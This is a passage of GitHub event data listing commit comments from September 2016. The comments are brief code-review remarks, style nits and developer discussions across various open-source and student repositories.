{"id":"4555463332","type":"CommitCommentEvent","actor":{"login":"aburch"},"repo":{"name":"fsateler/mkosi"},"payload":{"comment":{"id":19001109,"position":6,"line":456,"path":"mkosi","commit_id":"3656ae181c052a5f0b22456d364ed9dc4c40854b","created_at":"2016-09-13T13:07:52Z","updated_at":"2016-09-13T13:07:52Z","body":"[debootstrap 1.0.83](https://tracker.debian.org/news/797456) implements a new `--merged-usr` option that will install with a merged-/usr for supported releases (it has to be enabled in the distribution-specific part of the installer).  Currently it will only do so for Debian stretch and later.\r\n"}},"created_at":"2016-09-13T13:07:52Z"}
{"id":"4555464363","type":"CommitCommentEvent","actor":{"login":"timshannon"},"repo":{"name":"timshannon/go-openal"},"payload":{"comment":{"id":19001111,"position":null,"line":null,"path":null,"commit_id":"0a4cd0b7cd71bd1dba4e40e7010f96ee49eb80b0","created_at":"2016-09-13T13:08:05Z","updated_at":"2016-09-13T13:08:05Z","body":"Yeah, that makes sense, but is there a reason you're still on Go 1.3.3?  There have been several security and performance fixes in Go since then.  I'll note in the README the compatibility issue.  If you want a version compatible with Go 1.3.3, you can grab a previous commit.\r\n\r\nThanks for the heads up."}},"created_at":"2016-09-13T13:08:05Z"}
{"id":"4555464752","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001112,"position":8,"line":8,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:08:10Z","updated_at":"2016-09-13T13:08:10Z","body":"Why there are so many blank lines ?"}},"created_at":"2016-09-13T13:08:10Z"}
{"id":"4555466656","type":"CommitCommentEvent","actor":{"login":"markus2330"},"repo":{"name":"ElektraInitiative/libelektra"},"payload":{"comment":{"id":19001116,"position":17,"line":373,"path":"src/plugins/crypto/gpg.c","commit_id":"d5f4a028da86b990351685eeb19a0aac3f61a99e","created_at":"2016-09-13T13:08:30Z","updated_at":"2016-09-13T13:08:30Z","body":"I ask because a separate PR for unrelated changes would be preferable. They should at least be in a separate commit describing their purpose."}},"created_at":"2016-09-13T13:08:30Z"}
{"id":"4555468864","type":"CommitCommentEvent","actor":{"login":"allustin"},"repo":{"name":"silverbulleters/vanessa-behavior"},"payload":{"comment":{"id":19001120,"position":5,"line":6079,"path":"src/vanessa-behavior/Form/УправляемаяФорма/Форма.bsl","commit_id":"80d8d02688d2164f4f1a76fa9f5aa6cbeb45dfa9","created_at":"2016-09-13T13:08:54Z","updated_at":"2016-09-13T13:08:54Z","body":"#384 - @nixel2007 тут не только это исправление, тут глобальней ;-)"}},"created_at":"2016-09-13T13:08:54Z"}
{"id":"4555469064","type":"CommitCommentEvent","actor":{"login":"JoshEngebretson"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":19001121,"position":7,"line":null,"path":"Source/AtomicNET/NETScript/CSComponentAssembly.cpp","commit_id":"9a0ac4aa9e6733241e1f5dcbb9d17a1ab05a4cac","created_at":"2016-09-13T13:08:56Z","updated_at":"2016-09-13T13:08:56Z","body":"That is pesky, doing all the platforms means I am constantly switching between OS's and IDE's.  If it isn't one, it is the other... These particular tabs looks to be my QtCreator, gah... thanks for the note"}},"created_at":"2016-09-13T13:08:56Z"}
{"id":"4555470529","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19001123,"position":7,"line":69,"path":"src/MeshGroup.cpp","commit_id":"26b78d68f44841dacf71921a003a7e78fd541821","created_at":"2016-09-13T13:09:14Z","updated_at":"2016-09-13T13:09:14Z","body":"Why did you need to put this in a separate function?\r\n`if (!meshgroup->extruders[extruder_nr])` seems perfectly semantic to me."}},"created_at":"2016-09-13T13:09:14Z"}
{"id":"4555474809","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001135,"position":6,"line":6,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:10:02Z","updated_at":"2016-09-13T13:10:02Z","body":"Why are you including this file. Are u using this class anywhere ?"}},"created_at":"2016-09-13T13:10:02Z"}
{"id":"4555478465","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"jlandwehr-avarteq/ruby_introduction_course"},"payload":{"comment":{"id":19001143,"position":8,"line":8,"path":"blog/app/controllers/articles_controller.rb","commit_id":"c2b95b6a6d3fa8145e8ebe6c1d2e4527d6e74ea5","created_at":"2016-09-13T13:10:41Z","updated_at":"2016-09-13T13:10:41Z","body":"empty line?"}},"created_at":"2016-09-13T13:10:41Z"}
{"id":"4555479911","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"jlandwehr-avarteq/ruby_introduction_course"},"payload":{"comment":{"id":19001146,"position":1,"line":1,"path":"blog/app/views/articles/new.html.erb","commit_id":"c2b95b6a6d3fa8145e8ebe6c1d2e4527d6e74ea5","created_at":"2016-09-13T13:10:57Z","updated_at":"2016-09-13T13:10:57Z","body":"leave some space between the title and the form?"}},"created_at":"2016-09-13T13:10:57Z"}
{"id":"4555486932","type":"CommitCommentEvent","actor":{"login":"zhnew"},"repo":{"name":"pingcap/tidb"},"payload":{"comment":{"id":19001169,"position":21,"line":36,"path":"table/table.go","commit_id":"7c7b1b59f5ab9f73355acce46aa0185e0022c6f1","created_at":"2016-09-13T13:12:16Z","updated_at":"2016-09-13T13:12:16Z","body":"ClassTable is a int, maybe terror.ErrClass.New(......) works?"}},"created_at":"2016-09-13T13:12:16Z"}
{"id":"4555488546","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"jlandwehr-avarteq/ruby_introduction_course"},"payload":{"comment":{"id":19001172,"position":3,"line":2,"path":"blog/config/routes.rb","commit_id":"c2b95b6a6d3fa8145e8ebe6c1d2e4527d6e74ea5","created_at":"2016-09-13T13:12:35Z","updated_at":"2016-09-13T13:12:35Z","body":"useful to keep it?"}},"created_at":"2016-09-13T13:12:35Z"}
{"id":"4555489111","type":"CommitCommentEvent","actor":{"login":"voidtek"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19001175,"position":8,"line":85,"path":"profiles/common/modules/custom/nexteuropa_token/src/Entity/ViewModeTokenHandler.php","commit_id":"2c7103811dd6211c472eb73a649fc0a8a24aba15","created_at":"2016-09-13T13:12:41Z","updated_at":"2016-09-13T13:12:41Z","body":"The dependency of nexteuropa is wanted and necessary, because the tool \"insert an internal block\" is an add-on of the tool \"insert an internal content\" (with the \"insert an internal link\")."}},"created_at":"2016-09-13T13:12:41Z"}
{"id":"4555489339","type":"CommitCommentEvent","actor":{"login":"cwilgenhoff"},"repo":{"name":"Gzopel/rabbits3d-client"},"payload":{"comment":{"id":19001176,"position":18,"line":18,"path":"views/animationFrame.js","commit_id":"3cf10ca893122f356efd7b369fa83a84ed7c6447","created_at":"2016-09-13T13:12:44Z","updated_at":"2016-09-13T13:12:44Z","body":"Please use meaningfull variable names."}},"created_at":"2016-09-13T13:12:44Z"}
{"id":"4555490571","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001179,"position":18,"line":18,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:12:57Z","updated_at":"2016-09-13T13:12:57Z","body":"Change this comment :)"}},"created_at":"2016-09-13T13:12:57Z"}
{"id":"4555490809","type":"CommitCommentEvent","actor":{"login":"cwilgenhoff"},"repo":{"name":"Gzopel/rabbits3d-client"},"payload":{"comment":{"id":19001181,"position":20,"line":20,"path":"views/animationFrame.js","commit_id":"3cf10ca893122f356efd7b369fa83a84ed7c6447","created_at":"2016-09-13T13:12:59Z","updated_at":"2016-09-13T13:12:59Z","body":"Render the Root Component instead."}},"created_at":"2016-09-13T13:12:59Z"}
{"id":"4555495003","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"jlandwehr-avarteq/ruby_introduction_course"},"payload":{"comment":{"id":19001190,"position":5,"line":5,"path":"blog/app/controllers/articles_controller.rb","commit_id":"a9bf7605d3c430989a9004e21d1c8d29c4565897","created_at":"2016-09-13T13:13:44Z","updated_at":"2016-09-13T13:13:44Z","body":"2 empty lines?"}},"created_at":"2016-09-13T13:13:44Z"}
{"id":"4555496177","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"jlandwehr-avarteq/ruby_introduction_course"},"payload":{"comment":{"id":19001191,"position":21,"line":20,"path":"blog/app/controllers/articles_controller.rb","commit_id":"a9bf7605d3c430989a9004e21d1c8d29c4565897","created_at":"2016-09-13T13:13:57Z","updated_at":"2016-09-13T13:13:57Z","body":"empty line?"}},"created_at":"2016-09-13T13:13:57Z"}
{"id":"4555498715","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"ForestryMC/ForestryMC"},"payload":{"comment":{"id":19001198,"position":null,"line":null,"path":null,"commit_id":"79c56311c2a3d3e7b3326044e58f0cee50474380","created_at":"2016-09-13T13:14:23Z","updated_at":"2016-09-13T13:14:23Z","body":"I am calling it Forge Energy (FE) for now until I come across a proper name"}},"created_at":"2016-09-13T13:14:23Z"}
{"id":"4555499372","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"jlandwehr-avarteq/ruby_introduction_course"},"payload":{"comment":{"id":19001200,"position":2,"line":2,"path":"blog/app/views/articles/show.html.erb","commit_id":"a9bf7605d3c430989a9004e21d1c8d29c4565897","created_at":"2016-09-13T13:14:30Z","updated_at":"2016-09-13T13:14:30Z","body":"on one line?"}},"created_at":"2016-09-13T13:14:30Z"}
{"id":"4555500120","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"jlandwehr-avarteq/ruby_introduction_course"},"payload":{"comment":{"id":19001202,"position":6,"line":6,"path":"blog/app/views/articles/show.html.erb","commit_id":"a9bf7605d3c430989a9004e21d1c8d29c4565897","created_at":"2016-09-13T13:14:39Z","updated_at":"2016-09-13T13:14:39Z","body":"why not on one line?"}},"created_at":"2016-09-13T13:14:39Z"}
{"id":"4555502467","type":"CommitCommentEvent","actor":{"login":"Afandi84"},"repo":{"name":"Afandi84/afandi84"},"payload":{"comment":{"id":19001208,"position":null,"line":null,"path":null,"commit_id":"97daef10115fdd5b2945e89218a7d814e72b522e","created_at":"2016-09-13T13:15:08Z","updated_at":"2016-09-13T13:15:08Z","body":"test"}},"created_at":"2016-09-13T13:15:08Z"}
{"id":"4555503352","type":"CommitCommentEvent","actor":{"login":"rjsh461"},"repo":{"name":"abkba/abkba.github.io"},"payload":{"comment":{"id":19001211,"position":null,"line":null,"path":null,"commit_id":"ec7a8a7043568c8fa7d968604836a3a94e898724","created_at":"2016-09-13T13:15:18Z","updated_at":"2016-09-13T13:15:18Z","body":"Mast kia..Used Adobe PhotoShop ?"}},"created_at":"2016-09-13T13:15:18Z"}
{"id":"4555505172","type":"CommitCommentEvent","actor":{"login":"cwilgenhoff"},"repo":{"name":"Gzopel/rabbits3d-client"},"payload":{"comment":{"id":19001218,"position":31,"line":31,"path":"views/animationFrame.js","commit_id":"3cf10ca893122f356efd7b369fa83a84ed7c6447","created_at":"2016-09-13T13:15:36Z","updated_at":"2016-09-13T13:15:36Z","body":"Turn this into a component and use a timer else where to control the re-renderings, that way you will request a new animation frame."}},"created_at":"2016-09-13T13:15:36Z"}
{"id":"4555505816","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001220,"position":10,"line":10,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:15:43Z","updated_at":"2016-09-13T13:15:43Z","body":"About the class ?"}},"created_at":"2016-09-13T13:15:43Z"}
{"id":"4555506848","type":"CommitCommentEvent","actor":{"login":"psolaimani"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19001224,"position":157,"line":205,"path":"core/src/main/java/org/renjin/stats/internals/distributions/RNG.java","commit_id":"d98ee2274cf4e688d30eedcdadf893308797f901","created_at":"2016-09-13T13:15:53Z","updated_at":"2016-09-13T13:15:53Z","body":"@akbertram this was more to avoid ArrayOutOFBoundsException in the next iteration of the loop when argument is of the length 1."}},"created_at":"2016-09-13T13:15:53Z"}
{"id":"4555507698","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001227,"position":2,"line":2,"path":"src/VocabularyListBuilder.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:16:04Z","updated_at":"2016-09-13T13:16:04Z","body":"About the file ?"}},"created_at":"2016-09-13T13:16:04Z"}
{"id":"4555507924","type":"CommitCommentEvent","actor":{"login":"quii"},"repo":{"name":"mergermarket/goMakeIt"},"payload":{"comment":{"id":19001228,"position":null,"line":null,"path":null,"commit_id":"31d3f3eed565c0031c78a56f642fd02da614db35","created_at":"2016-09-13T13:16:07Z","updated_at":"2016-09-13T13:16:07Z","body":"Nice one! "}},"created_at":"2016-09-13T13:16:07Z"}
{"id":"4555513238","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19001238,"position":157,"line":205,"path":"core/src/main/java/org/renjin/stats/internals/distributions/RNG.java","commit_id":"d98ee2274cf4e688d30eedcdadf893308797f901","created_at":"2016-09-13T13:17:03Z","updated_at":"2016-09-13T13:17:03Z","body":"But then you also still checking and resetting the bounds on the next iteration..."}},"created_at":"2016-09-13T13:17:03Z"}
{"id":"4555513941","type":"CommitCommentEvent","actor":{"login":"SebastianPoehn"},"repo":{"name":"sophos-iaas/sg-iaas"},"payload":{"comment":{"id":19001243,"position":6,"line":17,"path":"README.md","commit_id":"5ece986845c4ada9e9f0301c8b9029e7216c9bd7","created_at":"2016-09-13T13:17:13Z","updated_at":"2016-09-13T13:17:13Z","body":"Latest fedora uses \"dnf\" now"}},"created_at":"2016-09-13T13:17:13Z"}
{"id":"4555514753","type":"CommitCommentEvent","actor":{"login":"jimitndiaye"},"repo":{"name":"swimlane/angular2-data-table"},"payload":{"comment":{"id":19001244,"position":23,"line":65,"path":"src/components/DataTable.ts","commit_id":"6a89e7a40feac42555383279caa4b3484512d8fc","created_at":"2016-09-13T13:17:20Z","updated_at":"2016-09-13T13:17:20Z","body":"This shouldn't even be necessary, but I guess if it works it works. :+1: "}},"created_at":"2016-09-13T13:17:20Z"}
{"id":"4555515904","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"caskdata/hydrator-plugins"},"payload":{"comment":{"id":19001247,"position":null,"line":null,"path":null,"commit_id":"a4d533519aa15e155f76302deed559c09f30ae4f","created_at":"2016-09-13T13:17:32Z","updated_at":"2016-09-13T13:17:32Z","body":"Updated code with review comments.\r\nPlease review again. Thanks!"}},"created_at":"2016-09-13T13:17:32Z"}
{"id":"4555516003","type":"CommitCommentEvent","actor":{"login":"PhilippSchwarze"},"repo":{"name":"PhilippSchwarze/website"},"payload":{"comment":{"id":19001249,"position":null,"line":null,"path":null,"commit_id":"4fc1e61586f39d3ce4481d4f83f1f11dac205938","created_at":"2016-09-13T13:17:33Z","updated_at":"2016-09-13T13:17:33Z","body":"Associating with #3 with this commit."}},"created_at":"2016-09-13T13:17:33Z"}
{"id":"4555517836","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001253,"position":20,"line":20,"path":"src/VocabularyListBuilder.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:17:54Z","updated_at":"2016-09-13T13:17:54Z","body":"Even I don't know, What is the use of this variable ?"}},"created_at":"2016-09-13T13:17:54Z"}
{"id":"4555521298","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19001265,"position":82,"line":103,"path":"theatre.rb","commit_id":"d22ae670c560981c9c15a792f5cdd64a2beebcc5","created_at":"2016-09-13T13:18:31Z","updated_at":"2016-09-13T13:18:31Z","body":"Сложновато! Давай выкинем exclude-фильтры, что ли."}},"created_at":"2016-09-13T13:18:31Z"}
{"id":"4555524494","type":"CommitCommentEvent","actor":{"login":"ElPumpo"},"repo":{"name":"ElPumpo/TinyNvidiaUpdateChecker"},"payload":{"comment":{"id":19001271,"position":null,"line":null,"path":null,"commit_id":"4fd3ccb0354f6be13c3506fd04ab292ff0dfcc2e","created_at":"2016-09-13T13:19:07Z","updated_at":"2016-09-13T13:19:07Z","body":"Will have to be tested first before going out with it - this is not confirmed!"}},"created_at":"2016-09-13T13:19:07Z"}
{"id":"4555525953","type":"CommitCommentEvent","actor":{"login":"bangwu93"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":19001274,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T13:19:22Z","updated_at":"2016-09-13T13:19:22Z","body":"Dear Vivian,\n\n \n\nI have pulled the master branch to my clone and subsequently, committed B1.txt after changing it to my name. However, I have not pushed it yet.\n\n \n\nRegards,\n\nBangwu\n\n \n\nFrom: Low Bao Ling Vivian [mailto:notifications@github.com] \nSent: Tuesday, 13 September 2016 6:39 PM\nTo: sunset1215/rcs <rcs@noreply.github.com>\nCc: bangwu93 <bangwu.hong@hotmail.com>; Mention <mention@noreply.github.com>\nSubject: Re: [sunset1215/rcs] added testing file - bangwu.txt (904fc6a)\n\n \n\n@bangwu93 <https://github.com/bangwu93>  Yea, on SourceTree. You should have the latest master branch on your local machine right, since you added this file? Or you haven't clone the repo?\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/sunset1215/rcs/commit/904fc6aff546e28c14ed88cfb28f544d05690602#commitcomment-18999418> , or mute the thread <https://github.com/notifications/unsubscribe-auth/AUNh-r92Dt7orVJqMCHLOoc-uXxPXcNDks5qpn1ZgaJpZM4J7br3> .  <https://github.com/notifications/beacon/AUNh-tFAFbJ3xcFdSXdwBo6wxBwLAEZkks5qpn1ZgaJpZM4J7br3.gif> \n\n"}},"created_at":"2016-09-13T13:19:22Z"}
{"id":"4555528512","type":"CommitCommentEvent","actor":{"login":"dev-pan"},"repo":{"name":"dev-pan/hello-"},"payload":{"comment":{"id":19001285,"position":2,"line":2,"path":"README.md","commit_id":"04c6a1d578a8c8124342d71b086a246e6b3179bc","created_at":"2016-09-13T13:19:49Z","updated_at":"2016-09-13T13:19:49Z","body":"hello how are u"}},"created_at":"2016-09-13T13:19:49Z"}
{"id":"4555529174","type":"CommitCommentEvent","actor":{"login":"averissimo"},"repo":{"name":"yakyak/yakyak"},"payload":{"comment":{"id":19001288,"position":null,"line":null,"path":null,"commit_id":"01f2e57d7873d0ffb55c3f1a5158bc186de589a6","created_at":"2016-09-13T13:19:56Z","updated_at":"2016-09-13T13:19:56Z","body":"tested by removing ``~/.config/yakyak``, great job @davibe !"}},"created_at":"2016-09-13T13:19:56Z"}
{"id":"4555535436","type":"CommitCommentEvent","actor":{"login":"Daniel-dk"},"repo":{"name":"geolink/opentracker"},"payload":{"comment":{"id":19001308,"position":81,"line":107,"path":"OpenTracker/reboot.ino","commit_id":"def3fb8bae307c41dd8fb86d08fc6d4ed9b479c7","created_at":"2016-09-13T13:21:03Z","updated_at":"2016-09-13T13:21:03Z","body":"are you missing a call to : \"cpu_full_speed(); \" here ?\r\nmy opentracker ( v2.3 ) seems to go to sleep ( detach from USB ) but never wakes up again\r\n\r\nI've added \"cpu_full_speed();\" to \"exit_low_power()\" and \r\nedited the loop() to use the low power calls:\r\n```\r\n if(time_diff > 0) {\r\n    //  addon_delay(time_diff);\r\n        // sleep mode\r\n      if(time_diff > 4000) {\r\n        enter_low_power();\r\n      }\r\n\t\taddon_delay(time_diff);\r\n\r\n      if(time_diff > 4000) {\r\n        exit_low_power();\r\n      }\r\n      // exit sleep mode\r\n    } \r\n```"}},"created_at":"2016-09-13T13:21:03Z"}
{"id":"4555535856","type":"CommitCommentEvent","actor":{"login":"maskerwind"},"repo":{"name":"maskerwind/NetSecurity"},"payload":{"comment":{"id":19001313,"position":null,"line":null,"path":null,"commit_id":"7f784757581e956fd434ea5ace7893c5eecea66c","created_at":"2016-09-13T13:21:09Z","updated_at":"2016-09-13T13:21:09Z","body":"选题信息"}},"created_at":"2016-09-13T13:21:09Z"}
{"id":"4555537006","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001316,"position":5,"line":5,"path":"termcase.info.yml","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:21:20Z","updated_at":"2016-09-13T13:21:20Z","body":"Package ?"}},"created_at":"2016-09-13T13:21:20Z"}
{"id":"4555538811","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001322,"position":12,"line":12,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:21:38Z","updated_at":"2016-09-13T13:21:38Z","body":"Leave a blank line."}},"created_at":"2016-09-13T13:21:38Z"}
{"id":"4555544650","type":"CommitCommentEvent","actor":{"login":"FabioCZ"},"repo":{"name":"FabioCZ/jarvis"},"payload":{"comment":{"id":19001339,"position":null,"line":null,"path":null,"commit_id":"2ce09bd3db1cb1dc7ed65fdbcf3c2363f47a70d1","created_at":"2016-09-13T13:22:37Z","updated_at":"2016-09-13T13:22:37Z","body":"It's just something I am playing with. I might scrap it altogether. We'll\nsee...\n\nOn Sep 12, 2016 10:15 PM, \"Jacob Christensen\" <notifications@github.com>\nwrote:\n\n> That's a lot of code for a pretty simple interface. I'm not sure how I\n> feel about it.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/FabioCZ/jarvis/commit/2ce09bd3db1cb1dc7ed65fdbcf3c2363f47a70d1#commitcomment-18995814>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABYizJA4ykamCr4Eu0qiZYNNZrcM5oPfks5qpiM-gaJpZM4J7Rn4>\n> .\n>\n"}},"created_at":"2016-09-13T13:22:37Z"}
{"id":"4555548216","type":"CommitCommentEvent","actor":{"login":"hausl"},"repo":{"name":"php-de/php-de.github.io"},"payload":{"comment":{"id":19001346,"position":null,"line":null,"path":null,"commit_id":"fdb126887deaa71ee5e73a4a12b57a8d035cb688","created_at":"2016-09-13T13:23:17Z","updated_at":"2016-09-13T13:23:17Z","body":"Ich fand das andere zwar weit angenehmer zu lesen (das hier sieht so \"hart\" aus), aber wegen mir ist das hier auch ok. Danke fürs ändern!"}},"created_at":"2016-09-13T13:23:17Z"}
{"id":"4555550923","type":"CommitCommentEvent","actor":{"login":"c-j-j"},"repo":{"name":"priya121/ruby-ttt-II"},"payload":{"comment":{"id":19001353,"position":6,"line":60,"path":"lib/board.rb","commit_id":"4a283fa76fa86232c6507771c3597fe8e26e3ffe","created_at":"2016-09-13T13:23:45Z","updated_at":"2016-09-13T13:23:45Z","body":"remember that you use `{}` for single line statements, `do end` for multi line.\r\n\r\nFeel free to mix them up;\r\n```\r\nlines.any? do |line|\r\n    line.all? { |position| @cells[position] == mark }\r\nend"}},"created_at":"2016-09-13T13:23:45Z"}
{"id":"4555553296","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001360,"position":95,"line":95,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:24:12Z","updated_at":"2016-09-13T13:24:12Z","body":"Leave a blank line and add a comment over here."}},"created_at":"2016-09-13T13:24:12Z"}
{"id":"4555558717","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001367,"position":98,"line":98,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:25:07Z","updated_at":"2016-09-13T13:25:07Z","body":"Please add Description."}},"created_at":"2016-09-13T13:25:07Z"}
{"id":"4555566040","type":"CommitCommentEvent","actor":{"login":"avgoor"},"repo":{"name":"toha10/python-cudet"},"payload":{"comment":{"id":19001385,"position":323,"line":610,"path":"cudet/nodes.py","commit_id":"917db82409ebb93fb1634e03310fb6b9740e05f9","created_at":"2016-09-13T13:26:22Z","updated_at":"2016-09-13T13:26:22Z","body":"It won't work if you have list() in node.get(attr) (like the 'roles' option), \"list() in list()\" doesn't return anything valuable."}},"created_at":"2016-09-13T13:26:22Z"}
{"id":"4555569031","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001393,"position":106,"line":106,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:26:52Z","updated_at":"2016-09-13T13:26:52Z","body":"Every comment must start with capital letter and end with full stop :)"}},"created_at":"2016-09-13T13:26:52Z"}
{"id":"4555570957","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001395,"position":113,"line":113,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:27:13Z","updated_at":"2016-09-13T13:27:13Z","body":"Please add Description."}},"created_at":"2016-09-13T13:27:13Z"}
{"id":"4555572828","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19001403,"position":4,"line":36,"path":"src/main.cpp","commit_id":"a4bb8ed287672a9d953a244035f80aea283f0d21","created_at":"2016-09-13T13:27:30Z","updated_at":"2016-09-13T13:27:30Z","body":"The term is \"verbosity\". Ah well."}},"created_at":"2016-09-13T13:27:30Z"}
{"id":"4555573335","type":"CommitCommentEvent","actor":{"login":"rafatower"},"repo":{"name":"CartoDB/dataservices-api"},"payload":{"comment":{"id":19001404,"position":5,"line":13,"path":"server/lib/python/cartodb_services/setup.py","commit_id":"4c19ee762e453c71dde04fc0c3b11496d0063d0f","created_at":"2016-09-13T13:27:35Z","updated_at":"2016-09-13T13:27:35Z","body":"we should recover the semantic versioning here too"}},"created_at":"2016-09-13T13:27:35Z"}
{"id":"4555573373","type":"CommitCommentEvent","actor":{"login":"TYoung86"},"repo":{"name":"schme16/gitcdn.xyz"},"payload":{"comment":{"id":19001405,"position":null,"line":null,"path":null,"commit_id":"26280f0b95ff3274072e1daac047ee6b7b389984","created_at":"2016-09-13T13:27:35Z","updated_at":"2016-09-13T13:27:35Z","body":"Related to https://github.com/schme16/gitcdn.xyz/issues/10 ?"}},"created_at":"2016-09-13T13:27:35Z"}
{"id":"4555576176","type":"CommitCommentEvent","actor":{"login":"sunset1215"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":19001410,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T13:28:06Z","updated_at":"2016-09-13T13:28:06Z","body":"@bangwu93 Oh ok. Then it's all good. Btw, you should not rename the B1.txt, but instead open the file and add your name inside. After that, try pushing it, and you should get an error, stating there's a conflict. That's because Nathan has already pushed his commit here. Try to resolve the error, by pulling from the remote and rebase your current changes onto it. Try the rebase by creating a branch of master first, in case anything goes wrong. Once you got it right, do it on the master branch. After that, push your commit. Let me know if you can't get it working. I'll post some screenshots."}},"created_at":"2016-09-13T13:28:06Z"}
{"id":"4555578268","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19001417,"position":4,"line":208,"path":"src/main.cpp","commit_id":"7b972305b5a86979b1c634cfda6e6cfede5b1d02","created_at":"2016-09-13T13:28:28Z","updated_at":"2016-09-13T13:28:28Z","body":"Didn't compile it first? :stuck_out_tongue_winking_eye: "}},"created_at":"2016-09-13T13:28:28Z"}
{"id":"4555580301","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001424,"position":127,"line":127,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:28:48Z","updated_at":"2016-09-13T13:28:48Z","body":"Please correct the format of function description."}},"created_at":"2016-09-13T13:28:48Z"}
{"id":"4555580413","type":"CommitCommentEvent","actor":{"login":"mermshaus"},"repo":{"name":"php-de/php-de.github.io"},"payload":{"comment":{"id":19001426,"position":null,"line":null,"path":null,"commit_id":"fdb126887deaa71ee5e73a4a12b57a8d035cb688","created_at":"2016-09-13T13:28:49Z","updated_at":"2016-09-13T13:28:49Z","body":"Ja, so ganz glücklich bin ich damit auch noch nicht. Ich werde bei Gelegenheit noch mal schauen, ob ich eins finde, das vielleicht in Richtung dessen geht, das GitHub nutzt. Das hat zumindest etwas mehr Kontrast und wäre vielleicht ein guter Kompromiss.\r\n\r\nDemo:\r\n\r\n~~~ css\r\n/* Extra small devices (phones, less than 768px) */\r\n/* No media query since this is the default in Bootstrap */\r\n\r\n/* Small devices (tablets, 768px and up) */\r\n@media (min-width: @screen-sm-min) { ... }\r\n\r\n/* Medium devices (desktops, 992px and up) */\r\n@media (min-width: @screen-md-min) { ... }\r\n\r\n/* Large 